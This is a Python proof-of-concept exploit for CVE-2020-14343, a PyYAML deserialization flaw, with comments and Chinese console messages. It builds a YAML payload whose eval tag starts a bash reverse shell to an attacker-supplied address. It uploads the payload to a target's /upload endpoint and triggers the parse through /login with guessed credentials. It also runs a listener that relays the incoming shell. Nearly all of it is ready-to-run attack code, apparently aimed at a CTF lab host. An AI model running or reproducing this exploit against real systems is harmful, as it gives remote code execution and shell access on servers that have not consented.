import requests
import sys
import threading
import socket
import time
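def build_payload(attacker_ip, attacker_port):
    """
    Return the malicious YAML document used for CVE-2020-14343.

    The document abuses PyYAML's ``!!python/object/new`` and
    ``!!python/name`` tags, which a vulnerable ``full_load()`` still
    resolves (fixed upstream in PyYAML 5.4): building
    ``tuple(map(eval, [...]))`` forces the loader to evaluate the embedded
    Python expression, which starts a bash reverse shell back to
    ``attacker_ip:attacker_port``.

    The ``\\\"`` sequence in the source yields a literal ``\"`` in the
    YAML, so the inner double quotes survive YAML's own double-quoted
    scalar unescaping and reach ``bash -c`` intact. Only the ``x`` key
    carries the exploit; ``host``/``info``/``user`` are presumably keys
    the target's config parser expects — not verified here.

    Args:
        attacker_ip: Address the victim should connect back to.
        attacker_port: Port the victim should connect back to.

    Returns:
        The YAML text, newline-terminated.
    """
    return f"""host: {attacker_ip}
info: Test
user: Admin
x: !!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('bash -c \\\"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\\\"')"]
"""


def exploit(target_url, attacker_ip, attacker_port, *, timeout=10):
    """
    CVE-2020-14343 PoC: upload a YAML file that the target later parses
    with an unsafe PyYAML loader, then trigger that parse via ``/login``.

    Only the two HTTP requests are issued here; the reverse shell itself
    arrives at whatever is listening on ``attacker_ip:attacker_port``.
    Use only against systems you are authorized to test.

    Args:
        target_url: Base URL of the target; ``/upload`` and ``/login`` are
            appended verbatim, so pass it without a trailing slash.
        attacker_ip: Address embedded in the payload for the callback.
        attacker_port: Port embedded in the payload for the callback.
        timeout: Per-request timeout in seconds (keyword-only) so an
            unresponsive target cannot hang the script indefinitely.

    Returns:
        True when both requests were sent and ``/login`` answered HTTP
        200. A 200 only proves the trigger request was accepted — it does
        not prove code execution; confirm on the listener.
    """
    malicious_yaml = build_payload(attacker_ip, attacker_port)
    # Multipart form: field name, filename and MIME type are whatever the
    # target's /upload handler expects and are taken from the original PoC.
    files = {
        'file': ('userConfig.yaml', malicious_yaml, 'application/x-yaml'),
    }

    # One session for both steps so any cookie set by /upload (e.g. one that
    # ties the stored file to this client) is still present when /login
    # parses it. The original sent the upload outside the session, which
    # contradicted its own "keep cookies" intent.
    session = requests.Session()

    # Step 1: upload the malicious YAML.
    print(f"[+] 上传恶意YAML文件到 {target_url}/upload")
    try:
        upload_response = session.post(
            f"{target_url}/upload",
            files=files,
            allow_redirects=False,
            timeout=timeout,
        )
        print(f"[+] 上传响应: {upload_response.status_code}")
    except requests.RequestException as e:
        print(f"[-] 上传失败: {e}")
        return False

    # Step 2: make the target load the file. The credentials are fixed
    # guesses from the original PoC; the parse is presumably triggered by
    # the login handler reading userConfig.yaml — not verified here.
    print("[+] 触发反序列化漏洞...")
    login_data = {
        'username': 'Admin',
        'password': '123456',
    }
    try:
        login_response = session.post(
            f"{target_url}/login",
            data=login_data,
            headers={'Content-Type': 'application/x-www-form-urlencoded'},
            timeout=timeout,
        )
    except requests.RequestException as e:
        print(f"[-] 触发漏洞失败: {e}")
        return False

    print(f"[+] 登录响应: {login_response.status_code}")
    if login_response.status_code == 200:
        print("[+] 漏洞利用成功!检查反弹shell连接...")
        return True
    print(f"[-] 可能利用失败,状态码: {login_response.status_code}")
    return False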
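def _relay(conn):
    """
    Pump one accepted connection until the peer closes, ``exit`` is typed
    locally, or an I/O error occurs.

    Each iteration reads up to 1024 bytes, prints them, then blocks on
    ``input()`` for one local line. The peer is trusted blindly: whatever
    it sends is written to the terminal as-is (``errors='ignore'`` only
    drops undecodable bytes; it does not strip terminal escape sequences).

    Args:
        conn: A connected ``socket.socket``; the caller owns closing it.
    """
    while True:
        try:
            # NOTE: a reply longer than 1024 bytes is shown one chunk per
            # typed line; draining with select() would fix that.
            data = conn.recv(1024)
            if not data:
                break
            # flush: a shell prompt has no trailing newline, and a
            # block-buffered stdout would otherwise show nothing until later.
            print(data.decode('utf-8', errors='ignore'), end='', flush=True)
            cmd = input()
            if cmd.strip().lower() == 'exit':
                break
            # sendall, not send: send() may write only part of the line.
            conn.sendall((cmd + '\n').encode())
        except KeyboardInterrupt:
            # Only reachable when _relay runs in the main thread; CPython
            # delivers SIGINT to the main thread, so inside main()'s worker
            # thread this handler is effectively dead.
            print("\n[*] 用户中断")
            break
        except (OSError, EOFError) as e:
            print(f"\n[-] 错误: {e}")
            break


def start_listener(port, *, bind_host='0.0.0.0'):
    """
    Run a minimal interactive TCP handler for the reverse shell.

    Accepts exactly one connection and relays it (see ``_relay``). Returns
    when the peer disconnects, ``exit`` is typed, or on error; errors are
    printed rather than raised, so a caller that needs to know whether the
    bind succeeded must observe the thread / console instead.

    Security caveats for the tester:
    - Binds to ``0.0.0.0`` by default, so any host that can reach the port
      may connect; the first connection wins and is trusted blindly. Pass
      ``bind_host`` to restrict the interface, or firewall the port.
    - The channel is plaintext; anything typed (including credentials on
      the victim) can be observed or tampered with on the wire.

    Args:
        port: TCP port to listen on.
        bind_host: Interface address to bind (keyword-only).
    """
    print(f"[*] 在端口 {port} 启动监听器...")
    try:
        # Context managers close both sockets even when accept() or the
        # relay loop raises; the original only closed them on the happy path.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind((bind_host, port))
            srv.listen(1)
            print(f"[+] 监听器已在 {bind_host}:{port} 启动")
            conn, addr = srv.accept()
            print(f"[+] 收到来自 {addr[0]}:{addr[1]} 的连接!")
            with conn:
                _relay(conn)
    except Exception as e:
        # Thread boundary: report and return instead of dying with a
        # traceback; main() checks whether this thread is still alive.
        print(f"[-] 监听器错误: {e}")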
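def main():
    """
    CLI entry point: parse argv, start the listener thread, fire the
    exploit, then wait on the listener until Ctrl+C.

    argv: ``<target URL> <attacker IP> <attacker port>``. Exits with
    status 1 on a wrong argument count, an unusable port, or when the
    listener fails to start (so the payload is never sent to a callback
    address nobody is listening on).
    """
    if len(sys.argv) != 4:
        print("用法: python cve-2020-14343_poc.py <目标URL> <攻击者IP> <攻击者端口>")
        print("示例: python cve-2020-14343_poc.py http://eci-2ze9naefg4wclmatagkc.cloudeci1.ichunqiu.com 192.168.1.100 4444")
        sys.exit(1)
    target_url = sys.argv[1]
    attacker_ip = sys.argv[2]
    # Validate the port up front: int() on junk would otherwise end in a
    # traceback, and an out-of-range value would only fail later in bind().
    try:
        attacker_port = int(sys.argv[3])
    except ValueError:
        attacker_port = -1
    if not 1 <= attacker_port <= 65535:
        print(f"[-] 无效端口: {sys.argv[3]} (需要 1-65535 的整数)")
        sys.exit(1)

    print("[*] CVE-2020-14343 PyYAML反序列化漏洞利用")
    print(f"[*] 目标: {target_url}")
    print(f"[*] 反弹shell到: {attacker_ip}:{attacker_port}")

    # Daemon thread so a listener that never receives a callback does not
    # keep the process alive after Ctrl+C.
    listener_thread = threading.Thread(target=start_listener, args=(attacker_port,))
    listener_thread.daemon = True
    listener_thread.start()
    # A fixed delay is a race, not a handshake: bind()/listen() normally
    # finish well within 2 s, but a slow host could still fire the exploit
    # before the socket is listening and lose the callback.
    time.sleep(2)
    # start_listener prints and returns on bind failure (e.g. port in use)
    # instead of raising, so a dead thread is the only signal we get.
    if not listener_thread.is_alive():
        print(f"[-] 监听器未能在端口 {attacker_port} 启动,中止利用")
        sys.exit(1)

    print("\n[*] 开始漏洞利用...")
    if exploit(target_url, attacker_ip, attacker_port):
        print("[+] 漏洞利用完成!")
    else:
        print("[-] 漏洞利用失败!")

    # Block on the listener; Ctrl+C lands in this (main) thread and ends
    # the program, the daemon listener thread is torn down with it.
    try:
        print("\n[*] 等待反弹shell连接... (Ctrl+C 退出)")
        listener_thread.join()
    except KeyboardInterrupt:
        print("\n[*] 退出程序")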
# Script entry point; importing this module defines the functions only and
# sends nothing.
if __name__ == "__main__":
    main()